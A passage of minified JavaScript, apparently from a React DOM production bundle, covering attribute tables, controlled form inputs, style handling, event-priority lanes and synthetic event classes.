font-family font-size font-size-adjust font-stretch font-style font-variant font-weight glyph-name glyph-orientation-horizontal glyph-orientation-vertical horiz-adv-x horiz-origin-x image-rendering letter-spacing lighting-color marker-end marker-mid marker-start overline-position overline-thickness paint-order panose-1 pointer-events rendering-intent shape-rendering stop-color stop-opacity strikethrough-position strikethrough-thickness stroke-dasharray stroke-dashoffset stroke-linecap stroke-linejoin stroke-miterlimit stroke-opacity stroke-width text-anchor text-decoration text-rendering underline-position underline-thickness unicode-bidi unicode-range units-per-em v-alphabetic v-hanging v-ideographic v-mathematical vector-effect vert-adv-y vert-origin-x vert-origin-y word-spacing writing-mode xmlns:xlink x-height".split(" ").forEach((function(e){var t=e.replace(_,w);v[t]=new g(t,1,!1,e,null,!1,!1)})),"xlink:actuate xlink:arcrole xlink:role xlink:show xlink:title xlink:type".split(" ").forEach((function(e){var t=e.replace(_,w);v[t]=new g(t,1,!1,e,"http://www.w3.org/1999/xlink",!1,!1)})),["xml:base","xml:lang","xml:space"].forEach((function(e){var t=e.replace(_,w);v[t]=new g(t,1,!1,e,"http://www.w3.org/XML/1998/namespace",!1,!1)})),["tabIndex","crossOrigin"].forEach((function(e){v[e]=new g(e,1,!1,e.toLowerCase(),null,!1,!1)})),v.xlinkHref=new g("xlinkHref",1,!1,"xlink:href","http://www.w3.org/1999/xlink",!0,!1),["src","href","action","formAction"].forEach((function(e){v[e]=new g(e,1,!1,e.toLowerCase(),null,!0,!0)}));var x=a.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED,y=60103,k=60106,E=60107,C=60108,S=60114,M=60109,L=60110,N=60112,Z=60113,P=60120,z=60115,A=60116,B=60121,H=60128,T=60129,R=60130,O=60131;if("function"==typeof Symbol&&Symbol.for){var j=Symbol.for;y=j("react.element"),k=j("react.portal"),E=j("react.fragment"),C=j("react.strict_mode"),S=j("react.profiler"),M=j("react.provider"),L=j("react.context"),N=j("react.forward_ref"),Z=j("react.suspense"),P=j("react.suspense_list"),z=j("react.memo"),A=j("react.lazy"),B=j("react.block"),j("react.scope"),H=j("react.opaque.id"),T=j("react.debug_trace_mode"),R=j("react.offscreen"),O=j("react.legacy_hidden")}var V,F="function"==typeof Symbol&&Symbol.iterator;function W(e){return null===e||"object"!=typeof e?null:"function"==typeof(e=F&&e[F]||e["@@iterator"])?e:null}function D(e){if(void 0===V)try{throw Error()}catch(e){var t=e.stack.trim().match(/\n( *(at )?)/);V=t&&t[1]||""}return"\n"+V+e}var I=!1;function U(e,t){if(!e||I)return"";I=!0;var n=Error.prepareStackTrace;Error.prepareStackTrace=void 0;try{if(t)if(t=function(){throw Error()},Object.defineProperty(t.prototype,"props",{set:function(){throw Error()}}),"object"==typeof Reflect&&Reflect.construct){try{Reflect.construct(t,[])}catch(e){var a=e}Reflect.construct(e,[],t)}else{try{t.call()}catch(e){a=e}e.call(t.prototype)}else{try{throw Error()}catch(e){a=e}e()}}catch(e){if(e&&a&&"string"==typeof e.stack){for(var r=e.stack.split("\n"),o=a.stack.split("\n"),i=r.length-1,l=o.length-1;1<=i&&0<=l&&r[i]!==o[l];)l--;for(;1<=i&&0<=l;i--,l--)if(r[i]!==o[l]){if(1!==i||1!==l)do{if(i--,0>--l||r[i]!==o[l])return"\n"+r[i].replace(" at new "," at ")}while(1<=i&&0<=l);break}}}finally{I=!1,Error.prepareStackTrace=n}return(e=e?e.displayName||e.name:"")?D(e):""}function $(e){switch(e.tag){case 5:return D(e.type);case 16:return D("Lazy");case 13:return D("Suspense");case 19:return D("SuspenseList");case 0:case 2:case 15:return U(e.type,!1);case 11:return U(e.type.render,!1);case 22:return U(e.type._render,!1);case 1:return U(e.type,!0);default:return""}}function G(e){if(null==e)return null;if("function"==typeof e)return e.displayName||e.name||null;if("string"==typeof e)return e;switch(e){case E:return"Fragment";case k:return"Portal";case S:return"Profiler";case C:return"StrictMode";case Z:return"Suspense";case P:return"SuspenseList"}if("object"==typeof e)switch(e.$$typeof){case L:return(e.displayName||"Context")+".Consumer";case M:return(e._context.displayName||"Context")+".Provider";case N:var t=e.render;return t=t.displayName||t.name||"",e.displayName||(""!==t?"ForwardRef("+t+")":"ForwardRef");case z:return G(e.type);case B:return G(e._render);case A:t=e._payload,e=e._init;try{return G(e(t))}catch(e){}}return null}function q(e){switch(typeof e){case"boolean":case"number":case"object":case"string":case"undefined":return e;default:return""}}function K(e){var t=e.type;return(e=e.nodeName)&&"input"===e.toLowerCase()&&("checkbox"===t||"radio"===t)}function X(e){e._valueTracker||(e._valueTracker=function(e){var t=K(e)?"checked":"value",n=Object.getOwnPropertyDescriptor(e.constructor.prototype,t),a=""+e[t];if(!e.hasOwnProperty(t)&&void 0!==n&&"function"==typeof n.get&&"function"==typeof n.set){var r=n.get,o=n.set;return Object.defineProperty(e,t,{configurable:!0,get:function(){return r.call(this)},set:function(e){a=""+e,o.call(this,e)}}),Object.defineProperty(e,t,{enumerable:n.enumerable}),{getValue:function(){return a},setValue:function(e){a=""+e},stopTracking:function(){e._valueTracker=null,delete e[t]}}}}(e))}function Q(e){if(!e)return!1;var t=e._valueTracker;if(!t)return!0;var n=t.getValue(),a="";return e&&(a=K(e)?e.checked?"true":"false":e.value),(e=a)!==n&&(t.setValue(e),!0)}function J(e){if(void 0===(e=e||("undefined"!=typeof document?document:void 0)))return null;try{return e.activeElement||e.body}catch(t){return e.body}}function Y(e,t){var n=t.checked;return r({},t,{defaultChecked:void 0,defaultValue:void 0,value:void 0,checked:null!=n?n:e._wrapperState.initialChecked})}function ee(e,t){var n=null==t.defaultValue?"":t.defaultValue,a=null!=t.checked?t.checked:t.defaultChecked;n=q(null!=t.value?t.value:n),e._wrapperState={initialChecked:a,initialValue:n,controlled:"checkbox"===t.type||"radio"===t.type?null!=t.checked:null!=t.value}}function te(e,t){null!=(t=t.checked)&&b(e,"checked",t,!1)}function ne(e,t){te(e,t);var n=q(t.value),a=t.type;if(null!=n)"number"===a?(0===n&&""===e.value||e.value!=n)&&(e.value=""+n):e.value!==""+n&&(e.value=""+n);else if("submit"===a||"reset"===a)return void e.removeAttribute("value");t.hasOwnProperty("value")?re(e,t.type,n):t.hasOwnProperty("defaultValue")&&re(e,t.type,q(t.defaultValue)),null==t.checked&&null!=t.defaultChecked&&(e.defaultChecked=!!t.defaultChecked)}function ae(e,t,n){if(t.hasOwnProperty("value")||t.hasOwnProperty("defaultValue")){var a=t.type;if(!("submit"!==a&&"reset"!==a||void 0!==t.value&&null!==t.value))return;t=""+e._wrapperState.initialValue,n||t===e.value||(e.value=t),e.defaultValue=t}""!==(n=e.name)&&(e.name=""),e.defaultChecked=!!e._wrapperState.initialChecked,""!==n&&(e.name=n)}function re(e,t,n){"number"===t&&J(e.ownerDocument)===e||(null==n?e.defaultValue=""+e._wrapperState.initialValue:e.defaultValue!==""+n&&(e.defaultValue=""+n))}function oe(e,t){return e=r({children:void 0},t),(t=function(e){var t="";return a.Children.forEach(e,(function(e){null!=e&&(t+=e)})),t}(t.children))&&(e.children=t),e}function ie(e,t,n,a){if(e=e.options,t){t={};for(var r=0;r<n.length;r++)t["$"+n[r]]=!0;for(n=0;n<e.length;n++)r=t.hasOwnProperty("$"+e[n].value),e[n].selected!==r&&(e[n].selected=r),r&&a&&(e[n].defaultSelected=!0)}else{for(n=""+q(n),t=null,r=0;r<e.length;r++){if(e[r].value===n)return e[r].selected=!0,void(a&&(e[r].defaultSelected=!0));null!==t||e[r].disabled||(t=e[r])}null!==t&&(t.selected=!0)}}function le(e,t){if(null!=t.dangerouslySetInnerHTML)throw Error(i(91));return r({},t,{value:void 0,defaultValue:void 0,children:""+e._wrapperState.initialValue})}function se(e,t){var n=t.value;if(null==n){if(n=t.children,t=t.defaultValue,null!=n){if(null!=t)throw Error(i(92));if(Array.isArray(n)){if(!(1>=n.length))throw Error(i(93));n=n[0]}t=n}null==t&&(t=""),n=t}e._wrapperState={initialValue:q(n)}}function pe(e,t){var n=q(t.value),a=q(t.defaultValue);null!=n&&((n=""+n)!==e.value&&(e.value=n),null==t.defaultValue&&e.defaultValue!==n&&(e.defaultValue=n)),null!=a&&(e.defaultValue=""+a)}function ce(e){var t=e.textContent;t===e._wrapperState.initialValue&&""!==t&&null!==t&&(e.value=t)}var de={html:"http://www.w3.org/1999/xhtml",mathml:"http://www.w3.org/1998/Math/MathML",svg:"http://www.w3.org/2000/svg"};function ue(e){switch(e){case"svg":return"http://www.w3.org/2000/svg";case"math":return"http://www.w3.org/1998/Math/MathML";default:return"http://www.w3.org/1999/xhtml"}}function me(e,t){return null==e||"http://www.w3.org/1999/xhtml"===e?ue(t):"http://www.w3.org/2000/svg"===e&&"foreignObject"===t?"http://www.w3.org/1999/xhtml":e}var fe,he,ge=(he=function(e,t){if(e.namespaceURI!==de.svg||"innerHTML"in e)e.innerHTML=t;else{for((fe=fe||document.createElement("div")).innerHTML="<svg>"+t.valueOf().toString()+"</svg>",t=fe.firstChild;e.firstChild;)e.removeChild(e.firstChild);for(;t.firstChild;)e.appendChild(t.firstChild)}},"undefined"!=typeof MSApp&&MSApp.execUnsafeLocalFunction?function(e,t,n,a){MSApp.execUnsafeLocalFunction((function(){return he(e,t)}))}:he);function ve(e,t){if(t){var n=e.firstChild;if(n&&n===e.lastChild&&3===n.nodeType)return void(n.nodeValue=t)}e.textContent=t}var _e={animationIterationCount:!0,borderImageOutset:!0,borderImageSlice:!0,borderImageWidth:!0,boxFlex:!0,boxFlexGroup:!0,boxOrdinalGroup:!0,columnCount:!0,columns:!0,flex:!0,flexGrow:!0,flexPositive:!0,flexShrink:!0,flexNegative:!0,flexOrder:!0,gridArea:!0,gridRow:!0,gridRowEnd:!0,gridRowSpan:!0,gridRowStart:!0,gridColumn:!0,gridColumnEnd:!0,gridColumnSpan:!0,gridColumnStart:!0,fontWeight:!0,lineClamp:!0,lineHeight:!0,opacity:!0,order:!0,orphans:!0,tabSize:!0,widows:!0,zIndex:!0,zoom:!0,fillOpacity:!0,floodOpacity:!0,stopOpacity:!0,strokeDasharray:!0,strokeDashoffset:!0,strokeMiterlimit:!0,strokeOpacity:!0,strokeWidth:!0},we=["Webkit","ms","Moz","O"];function be(e,t,n){return null==t||"boolean"==typeof t||""===t?"":n||"number"!=typeof t||0===t||_e.hasOwnProperty(e)&&_e[e]?(""+t).trim():t+"px"}function xe(e,t){for(var n in e=e.style,t)if(t.hasOwnProperty(n)){var a=0===n.indexOf("--"),r=be(n,t[n],a);"float"===n&&(n="cssFloat"),a?e.setProperty(n,r):e[n]=r}}Object.keys(_e).forEach((function(e){we.forEach((function(t){t=t+e.charAt(0).toUpperCase()+e.substring(1),_e[t]=_e[e]}))}));var ye=r({menuitem:!0},{area:!0,base:!0,br:!0,col:!0,embed:!0,hr:!0,img:!0,input:!0,keygen:!0,link:!0,meta:!0,param:!0,source:!0,track:!0,wbr:!0});function ke(e,t){if(t){if(ye[e]&&(null!=t.children||null!=t.dangerouslySetInnerHTML))throw Error(i(137,e));if(null!=t.dangerouslySetInnerHTML){if(null!=t.children)throw Error(i(60));if("object"!=typeof t.dangerouslySetInnerHTML||!("__html"in t.dangerouslySetInnerHTML))throw Error(i(61))}if(null!=t.style&&"object"!=typeof t.style)throw Error(i(62))}}function Ee(e,t){if(-1===e.indexOf("-"))return"string"==typeof t.is;switch(e){case"annotation-xml":case"color-profile":case"font-face":case"font-face-src":case"font-face-uri":case"font-face-format":case"font-face-name":case"missing-glyph":return!1;default:return!0}}function Ce(e){return(e=e.target||e.srcElement||window).correspondingUseElement&&(e=e.correspondingUseElement),3===e.nodeType?e.parentNode:e}var Se=null,Me=null,Le=null;function Ne(e){if(e=ar(e)){if("function"!=typeof Se)throw Error(i(280));var t=e.stateNode;t&&(t=or(t),Se(e.stateNode,e.type,t))}}function Ze(e){Me?Le?Le.push(e):Le=[e]:Me=e}function Pe(){if(Me){var e=Me,t=Le;if(Le=Me=null,Ne(e),t)for(e=0;e<t.length;e++)Ne(t[e])}}function ze(e,t){return e(t)}function Ae(e,t,n,a,r){return e(t,n,a,r)}function Be(){}var He=ze,Te=!1,Re=!1;function Oe(){null===Me&&null===Le||(Be(),Pe())}function je(e,t){var n=e.stateNode;if(null===n)return null;var a=or(n);if(null===a)return null;n=a[t];e:switch(t){case"onClick":case"onClickCapture":case"onDoubleClick":case"onDoubleClickCapture":case"onMouseDown":case"onMouseDownCapture":case"onMouseMove":case"onMouseMoveCapture":case"onMouseUp":case"onMouseUpCapture":case"onMouseEnter":(a=!a.disabled)||(a=!("button"===(e=e.type)||"input"===e||"select"===e||"textarea"===e)),e=!a;break e;default:e=!1}if(e)return null;if(n&&"function"!=typeof n)throw Error(i(231,t,typeof n));return n}var Ve=!1;if(d)try{var Fe={};Object.defineProperty(Fe,"passive",{get:function(){Ve=!0}}),window.addEventListener("test",Fe,Fe),window.removeEventListener("test",Fe,Fe)}catch(he){Ve=!1}function We(e,t,n,a,r,o,i,l,s){var p=Array.prototype.slice.call(arguments,3);try{t.apply(n,p)}catch(e){this.onError(e)}}var De=!1,Ie=null,Ue=!1,$e=null,Ge={onError:function(e){De=!0,Ie=e}};function qe(e,t,n,a,r,o,i,l,s){De=!1,Ie=null,We.apply(Ge,arguments)}function Ke(e){var t=e,n=e;if(e.alternate)for(;t.return;)t=t.return;else{e=t;do{0!=(1026&(t=e).flags)&&(n=t.return),e=t.return}while(e)}return 3===t.tag?n:null}function Xe(e){if(13===e.tag){var t=e.memoizedState;if(null===t&&null!==(e=e.alternate)&&(t=e.memoizedState),null!==t)return t.dehydrated}return null}function Qe(e){if(Ke(e)!==e)throw Error(i(188))}function Je(e){if(e=function(e){var t=e.alternate;if(!t){if(null===(t=Ke(e)))throw Error(i(188));return t!==e?null:e}for(var n=e,a=t;;){var r=n.return;if(null===r)break;var o=r.alternate;if(null===o){if(null!==(a=r.return)){n=a;continue}break}if(r.child===o.child){for(o=r.child;o;){if(o===n)return Qe(r),e;if(o===a)return Qe(r),t;o=o.sibling}throw Error(i(188))}if(n.return!==a.return)n=r,a=o;else{for(var l=!1,s=r.child;s;){if(s===n){l=!0,n=r,a=o;break}if(s===a){l=!0,a=r,n=o;break}s=s.sibling}if(!l){for(s=o.child;s;){if(s===n){l=!0,n=o,a=r;break}if(s===a){l=!0,a=o,n=r;break}s=s.sibling}if(!l)throw Error(i(189))}}if(n.alternate!==a)throw Error(i(190))}if(3!==n.tag)throw Error(i(188));return n.stateNode.current===n?e:t}(e),!e)return null;for(var t=e;;){if(5===t.tag||6===t.tag)return t;if(t.child)t.child.return=t,t=t.child;else{if(t===e)break;for(;!t.sibling;){if(!t.return||t.return===e)return null;t=t.return}t.sibling.return=t.return,t=t.sibling}}return null}function Ye(e,t){for(var n=e.alternate;null!==t;){if(t===e||t===n)return!0;t=t.return}return!1}var et,tt,nt,at,rt=!1,ot=[],it=null,lt=null,st=null,pt=new Map,ct=new Map,dt=[],ut="mousedown mouseup touchcancel touchend touchstart auxclick dblclick pointercancel pointerdown pointerup dragend dragstart drop compositionend compositionstart keydown keypress keyup input textInput copy cut paste click change contextmenu reset submit".split(" ");function mt(e,t,n,a,r){return{blockedOn:e,domEventName:t,eventSystemFlags:16|n,nativeEvent:r,targetContainers:[a]}}function ft(e,t){switch(e){case"focusin":case"focusout":it=null;break;case"dragenter":case"dragleave":lt=null;break;case"mouseover":case"mouseout":st=null;break;case"pointerover":case"pointerout":pt.delete(t.pointerId);break;case"gotpointercapture":case"lostpointercapture":ct.delete(t.pointerId)}}function ht(e,t,n,a,r,o){return null===e||e.nativeEvent!==o?(e=mt(t,n,a,r,o),null!==t&&null!==(t=ar(t))&&tt(t),e):(e.eventSystemFlags|=a,t=e.targetContainers,null!==r&&-1===t.indexOf(r)&&t.push(r),e)}function gt(e){var t=nr(e.target);if(null!==t){var n=Ke(t);if(null!==n)if(13===(t=n.tag)){if(null!==(t=Xe(n)))return e.blockedOn=t,void at(e.lanePriority,(function(){o.unstable_runWithPriority(e.priority,(function(){nt(n)}))}))}else if(3===t&&n.stateNode.hydrate)return void(e.blockedOn=3===n.tag?n.stateNode.containerInfo:null)}e.blockedOn=null}function vt(e){if(null!==e.blockedOn)return!1;for(var t=e.targetContainers;0<t.length;){var n=Jt(e.domEventName,e.eventSystemFlags,t[0],e.nativeEvent);if(null!==n)return null!==(t=ar(n))&&tt(t),e.blockedOn=n,!1;t.shift()}return!0}function _t(e,t,n){vt(e)&&n.delete(t)}function wt(){for(rt=!1;0<ot.length;){var e=ot[0];if(null!==e.blockedOn){null!==(e=ar(e.blockedOn))&&et(e);break}for(var t=e.targetContainers;0<t.length;){var n=Jt(e.domEventName,e.eventSystemFlags,t[0],e.nativeEvent);if(null!==n){e.blockedOn=n;break}t.shift()}null===e.blockedOn&&ot.shift()}null!==it&&vt(it)&&(it=null),null!==lt&&vt(lt)&&(lt=null),null!==st&&vt(st)&&(st=null),pt.forEach(_t),ct.forEach(_t)}function bt(e,t){e.blockedOn===t&&(e.blockedOn=null,rt||(rt=!0,o.unstable_scheduleCallback(o.unstable_NormalPriority,wt)))}function xt(e){function t(t){return bt(t,e)}if(0<ot.length){bt(ot[0],e);for(var n=1;n<ot.length;n++){var a=ot[n];a.blockedOn===e&&(a.blockedOn=null)}}for(null!==it&&bt(it,e),null!==lt&&bt(lt,e),null!==st&&bt(st,e),pt.forEach(t),ct.forEach(t),n=0;n<dt.length;n++)(a=dt[n]).blockedOn===e&&(a.blockedOn=null);for(;0<dt.length&&null===(n=dt[0]).blockedOn;)gt(n),null===n.blockedOn&&dt.shift()}function yt(e,t){var n={};return n[e.toLowerCase()]=t.toLowerCase(),n["Webkit"+e]="webkit"+t,n["Moz"+e]="moz"+t,n}var kt={animationend:yt("Animation","AnimationEnd"),animationiteration:yt("Animation","AnimationIteration"),animationstart:yt("Animation","AnimationStart"),transitionend:yt("Transition","TransitionEnd")},Et={},Ct={};function St(e){if(Et[e])return Et[e];if(!kt[e])return e;var t,n=kt[e];for(t in n)if(n.hasOwnProperty(t)&&t in Ct)return Et[e]=n[t];return e}d&&(Ct=document.createElement("div").style,"AnimationEvent"in window||(delete kt.animationend.animation,delete kt.animationiteration.animation,delete kt.animationstart.animation),"TransitionEvent"in window||delete kt.transitionend.transition);var Mt=St("animationend"),Lt=St("animationiteration"),Nt=St("animationstart"),Zt=St("transitionend"),Pt=new Map,zt=new Map,At=["abort","abort",Mt,"animationEnd",Lt,"animationIteration",Nt,"animationStart","canplay","canPlay","canplaythrough","canPlayThrough","durationchange","durationChange","emptied","emptied","encrypted","encrypted","ended","ended","error","error","gotpointercapture","gotPointerCapture","load","load","loadeddata","loadedData","loadedmetadata","loadedMetadata","loadstart","loadStart","lostpointercapture","lostPointerCapture","playing","playing","progress","progress","seeking","seeking","stalled","stalled","suspend","suspend","timeupdate","timeUpdate",Zt,"transitionEnd","waiting","waiting"];function Bt(e,t){for(var n=0;n<e.length;n+=2){var a=e[n],r=e[n+1];r="on"+(r[0].toUpperCase()+r.slice(1)),zt.set(a,t),Pt.set(a,r),p(r,[a])}}(0,o.unstable_now)();var Ht=8;function Tt(e){if(0!=(1&e))return Ht=15,1;if(0!=(2&e))return Ht=14,2;if(0!=(4&e))return Ht=13,4;var t=24&e;return 0!==t?(Ht=12,t):0!=(32&e)?(Ht=11,32):0!=(t=192&e)?(Ht=10,t):0!=(256&e)?(Ht=9,256):0!=(t=3584&e)?(Ht=8,t):0!=(4096&e)?(Ht=7,4096):0!=(t=4186112&e)?(Ht=6,t):0!=(t=62914560&e)?(Ht=5,t):67108864&e?(Ht=4,67108864):0!=(134217728&e)?(Ht=3,134217728):0!=(t=805306368&e)?(Ht=2,t):0!=(1073741824&e)?(Ht=1,1073741824):(Ht=8,e)}function Rt(e,t){var n=e.pendingLanes;if(0===n)return Ht=0;var a=0,r=0,o=e.expiredLanes,i=e.suspendedLanes,l=e.pingedLanes;if(0!==o)a=o,r=Ht=15;else if(0!=(o=134217727&n)){var s=o&~i;0!==s?(a=Tt(s),r=Ht):0!=(l&=o)&&(a=Tt(l),r=Ht)}else 0!=(o=n&~i)?(a=Tt(o),r=Ht):0!==l&&(a=Tt(l),r=Ht);if(0===a)return 0;if(a=n&((0>(a=31-Dt(a))?0:1<<a)<<1)-1,0!==t&&t!==a&&0==(t&i)){if(Tt(t),r<=Ht)return t;Ht=r}if(0!==(t=e.entangledLanes))for(e=e.entanglements,t&=a;0<t;)r=1<<(n=31-Dt(t)),a|=e[n],t&=~r;return a}function Ot(e){return 0!=(e=-1073741825&e.pendingLanes)?e:1073741824&e?1073741824:0}function jt(e,t){switch(e){case 15:return 1;case 14:return 2;case 12:return 0===(e=Vt(24&~t))?jt(10,t):e;case 10:return 0===(e=Vt(192&~t))?jt(8,t):e;case 8:return 0===(e=Vt(3584&~t))&&0===(e=Vt(4186112&~t))&&(e=512),e;case 2:return 0===(t=Vt(805306368&~t))&&(t=268435456),t}throw Error(i(358,e))}function Vt(e){return e&-e}function Ft(e){for(var t=[],n=0;31>n;n++)t.push(e);return t}function Wt(e,t,n){e.pendingLanes|=t;var a=t-1;e.suspendedLanes&=a,e.pingedLanes&=a,(e=e.eventTimes)[t=31-Dt(t)]=n}var Dt=Math.clz32?Math.clz32:function(e){return 0===e?32:31-(It(e)/Ut|0)|0},It=Math.log,Ut=Math.LN2,$t=o.unstable_UserBlockingPriority,Gt=o.unstable_runWithPriority,qt=!0;function Kt(e,t,n,a){Te||Be();var r=Qt,o=Te;Te=!0;try{Ae(r,e,t,n,a)}finally{(Te=o)||Oe()}}function Xt(e,t,n,a){Gt($t,Qt.bind(null,e,t,n,a))}function Qt(e,t,n,a){var r;if(qt)if((r=0==(4&t))&&0<ot.length&&-1<ut.indexOf(e))e=mt(null,e,t,n,a),ot.push(e);else{var o=Jt(e,t,n,a);if(null===o)r&&ft(e,a);else{if(r){if(-1<ut.indexOf(e))return e=mt(o,e,t,n,a),void ot.push(e);if(function(e,t,n,a,r){switch(t){case"focusin":return it=ht(it,e,t,n,a,r),!0;case"dragenter":return lt=ht(lt,e,t,n,a,r),!0;case"mouseover":return st=ht(st,e,t,n,a,r),!0;case"pointerover":var o=r.pointerId;return pt.set(o,ht(pt.get(o)||null,e,t,n,a,r)),!0;case"gotpointercapture":return o=r.pointerId,ct.set(o,ht(ct.get(o)||null,e,t,n,a,r)),!0}return!1}(o,e,t,n,a))return;ft(e,a)}Ha(e,t,a,null,n)}}}function Jt(e,t,n,a){var r=Ce(a);if(null!==(r=nr(r))){var o=Ke(r);if(null===o)r=null;else{var i=o.tag;if(13===i){if(null!==(r=Xe(o)))return r;r=null}else if(3===i){if(o.stateNode.hydrate)return 3===o.tag?o.stateNode.containerInfo:null;r=null}else o!==r&&(r=null)}}return Ha(e,t,a,r,n),null}var Yt=null,en=null,tn=null;function nn(){if(tn)return tn;var e,t,n=en,a=n.length,r="value"in Yt?Yt.value:Yt.textContent,o=r.length;for(e=0;e<a&&n[e]===r[e];e++);var i=a-e;for(t=1;t<=i&&n[a-t]===r[o-t];t++);return tn=r.slice(e,1<t?1-t:void 0)}function an(e){var t=e.keyCode;return"charCode"in e?0===(e=e.charCode)&&13===t&&(e=13):e=t,10===e&&(e=13),32<=e||13===e?e:0}function rn(){return!0}function on(){return!1}function ln(e){function t(t,n,a,r,o){for(var i in this._reactName=t,this._targetInst=a,this.type=n,this.nativeEvent=r,this.target=o,this.currentTarget=null,e)e.hasOwnProperty(i)&&(t=e[i],this[i]=t?t(r):r[i]);return this.isDefaultPrevented=(null!=r.defaultPrevented?r.defaultPrevented:!1===r.returnValue)?rn:on,this.isPropagationStopped=on,this}return r(t.prototype,{preventDefault:function(){this.defaultPrevented=!0;var e=this.nativeEvent;e&&(e.preventDefault?e.preventDefault():"unknown"!=typeof e.returnValue&&(e.returnValue=!1),this.isDefaultPrevented=rn)},stopPropagation:function(){var e=this.nativeEvent;e&&(e.stopPropagation?e.stopPropagation():"unknown"!=typeof e.cancelBubble&&(e.cancelBubble=!0),this.isPropagationStopped=rn)},persist:function(){},isPersistent:rn}),t}var sn,pn,cn,dn={eventPhase:0,bubbles:0,cancelable:0,timeStamp:function(e){return e.timeStamp||Date.now()},defaultPrevented:0,isTrusted:0},un=ln(dn),mn=r({},dn,{view:0,detail:0}),fn=ln(mn),hn=r({},mn,{screenX:0,screenY:0,clientX:0,clientY:0,pageX:0,pageY:0,ctrlKey:0,shiftKey:0,altKey:0,metaKey:0,getModifierState:Ln,button:0,buttons:0,relatedTarget:function(e){return void 0===e.relatedTarget?e.fromElement===e.srcElement?e.toElement:e.fromElement:e.relatedTarget},movementX:function(e){return"movementX"in e?e.movementX:(e!==cn&&(cn&&"mousemove"===e.type?(sn=e.screenX-cn.screenX,pn=e.screenY-cn.screenY):pn=sn=0,cn=e),sn)},movementY:function(e){return"movementY"in e?e.movementY:pn}}),gn=ln(hn),vn=ln(r({},hn,{dataTransfer:0})),wn=ln(r({},mn,{relatedTarget:0})),bn=ln(r({},dn,{animationName:0,elapsedTime:0,pseudoElement:0})),xn=r({},dn,{clipboardData:function(e){return"clipboardData"in e?e.clipboardData:window.clipboardData}}),yn=ln(xn),kn=ln(r({},dn,{data:0})),En={Esc:"Escape",Spacebar:" ",Left:"ArrowLeft",Up:"ArrowUp",Right:"ArrowRight",Down:"ArrowDown",Del:"Delete",Win:"OS",Menu:"ContextMenu",Apps:"ContextMenu",Scroll:"ScrollLock",MozPrintableKey:"Unidentified"},Cn={8:"Backspace",9:"Tab",12:"Clear",13:"Enter",16:"Shift",17:"Control",18:"Alt",19:"Pause",20:"CapsLock",27:"Escape",32:" ",33:"PageUp",34:"PageDown",35:"End",36:"Home",37:"ArrowLeft",38:"ArrowUp",39:"ArrowRight",40:"ArrowDown",45:"Insert",46:"Delete",112:"F1",113:"F2",114:"F3",115:"F4",116:"F5",117:"F6",118:"F7",119:"F8",120:"F9",121:"F10",122:"F11",123:"F12",144:"NumLock",145:"ScrollLock",224:"Meta"},Sn={Alt:"altKey",Control:"ctrlKey",Meta:"metaKey",Shift:"shiftKey"};function Mn(e){var t=this.nativeEvent;return t.getModifierState?t.getModifierState(e):!!(e=Sn[e])&&!!t[e]}function Ln(){return Mn}var Nn=r({},mn,{key:function(e){if(e.key){var t=En[e.key]||e.key;if("Unidentified"!==t)return t}return"keypress"===e.type?13===(e=an(e))?"Enter":String.fromCharCode(e):"keydown"===e.type||"keyup"===e.type?Cn[e.keyCode]||"Unidentified":""},code:0,location:0,ctrlKey:0,shiftKey:0,altKey:0,metaKey:0,repeat:0,locale:0,getModifierState:Ln,charCode:function(e){return"keypress"===e.type?an(e):0},keyCode:function(e){return"keydown"===e.type||"keyup"===e.type?e.keyCode:0},which:function(e){return"keypress"===e.type?an(e):"keydown"===e.type||"keyup"===e.type?e.keyCode:0}}),Zn=ln(Nn),Pn=ln(r({},hn,{pointerId:0,width:0,height:0,pressure:0,tangentialPressure:0,tiltX:0,tiltY:0,twist:0,pointerType:0,isPrimary:0})),zn=ln(r({},mn,{touches:0,targetTouches:0,changedTouches:0,altKey:0,metaKey:0,ctrlKey:0,shiftKey:0,getModifierState:Ln})),An=ln(r({},dn,{propertyName:0,elapsedTime:0,pseudoElement:0})),Bn=r({},hn,{deltaX:function(e){return"deltaX"in e?e.deltaX:"wheelDeltaX"in e?-e.wheelDeltaX:0},deltaY:function(e){return"deltaY"in e?e.deltaY:"wheelDeltaY"in e?-e.wheelDeltaY:"wheelDelta"in e?-e.wheelDelta:0},deltaZ:0,deltaMode:0}),Hn=ln(Bn),Tn=[9,13,27,32],Rn=d&&"CompositionEvent"in window,On=null;d&&"documentMode"in document&&(On=document.documentMode);var jn=d&&"TextEvent"in window&&!On,Vn=d&&(!Rn||On&&8<On&&11>=On),Fn=String.fromCharCode(32),Wn=!1;function Dn(e,t){switch(e){case"keyup":return-1!==Tn.indexOf(t.keyCode);case"keydown":return 229!==t.keyCode;case"keypress":case"mousedown":case"focusout":return!0;default:return!1}}function In(e){return"object"==typeof(e=e.detail)&&"data"in e?e.data:null}var Un=!1,$n={color:!0,date:!0,datetime:!0,"datetime-local":!0,email:!0,month:!0,number:!0,password:!0,range:!0,search:!0,tel:!0,text:!0,time:!0,url:!0,week:!0};function Gn(e){var t=e&&e.nodeName&&e.nodeName.toLowerCase();return"input"===t?!!$n[e.type]:"textarea"===t}function qn(e,t,n,a){Ze(a),0<(t=Ra(t,"onChange")).length&&(n=new un("onChange","change",null,n,a),e.push({event:n,listeners:t}))}var Kn=null,Xn=null;function Qn(e){Na(e,0)}function Jn(e){if(Q(rr(e)))return e}function Yn(e,t){if("change"===e)return t}var ea=!1;if(d){var ta;if(d){var na="oninput"in document;if(!na){var aa=document.createElement("div");aa.setAttribute("oninput","return;"),na="function"==typeof aa.oninput}ta=na}else ta=!1;ea=ta&&(!document.documentMode||9<document.documentMode)}function ra(){Kn&&(Kn.detachEvent("onpropertychange",oa),Xn=Kn=null)}function oa(e){if("value"===e.propertyName&&Jn(Xn)){var t=[];if(qn(t,Xn,e,Ce(e)),e=Qn,Te)e(t);else{Te=!0;try{ze(e,t)}finally{Te=!1,Oe()}}}}function ia(e,t,n){"focusin"===e?(ra(),Xn=n,(Kn=t).attachEvent("onpropertychange",oa)):"focusout"===e&&ra()}function la(e){if("selectionchange"===e||"keyup"===e||"keydown"===e)return Jn(Xn)}function sa(e,t){if("click"===e)return Jn(t)}function pa(e,t){if("input"===e||"change"===e)return Jn(t)}var ca="function"==typeof Object.is?Object.is:function(e,t){return e===t&&(0!==e||1/e==1/t)||e!=e&&t!=t},da=Object.prototype.hasOwnProperty;function ua(e,t){if(ca(e,t))return!0;if("object"!=typeof e||null===e||"object"!=typeof t||null===t)return!1;var 